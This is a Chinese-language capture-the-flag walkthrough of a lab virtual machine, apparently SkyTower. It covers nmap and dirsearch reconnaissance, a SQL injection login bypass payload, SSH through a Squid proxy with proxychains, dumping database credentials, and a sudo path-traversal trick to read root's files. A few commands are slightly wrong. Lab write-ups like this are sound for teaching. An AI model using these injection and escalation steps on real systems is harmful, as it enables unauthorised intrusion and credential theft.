一、信息收集
1、主机发现
nmap 192.168.7.0/24 -sn | grep -B 2 '08:00:27:54:4A:37'
2、端口扫描
nmap 192.168.7.61 -p- -sV
3、目录扫描
dirsearch -u "http://192.168.7.61"
二、GetShell
步骤一:访问80端口,发现登录框,测试SQL注入
步骤二:email输入a' || 1=1 #
,密码随便,回显出john用户及密码
步骤三:开放22端口,尝试ssh连接,发现连接不上
步骤四:还开放一个3128端口,可能是ssh代理端口,尝试挂代理连接
vim /etc/proxychains4.conf
proxychains ssh john@192.168.7.61 -t "/bin/bash"
三、提权
步骤一:输入sudo -l,发现不能进行提权
步骤二:login.php存在sql注入,查看下login.php文件,发现数据库的账号和密码,连接
cat /var/www/login.php
mysql -u root -p #连接数据库
步骤三:查看数据库信息
show database; #查看数据库信息
use SkyTech; #切换用户
show tables; #查看SkyTech数据库下的表
select * from login #查看表下数据
步骤四:ssh 连接 sara 用户
proxychains ssh sara@192.168.7.61 -t "/bin/sh"
步骤五:再次使用 sudo -l 查看权限
步骤六:利用accounts/的权限,查看root下的文件,发现root用户的密码为theskytower
sudo ls /accounts/../root
sudo cat /accounts/../root/flag.txt
步骤七:使用 ssh 连接 root 用户,提权成功
proxychains ssh root@192.168.7.61 -t "/bin/sh"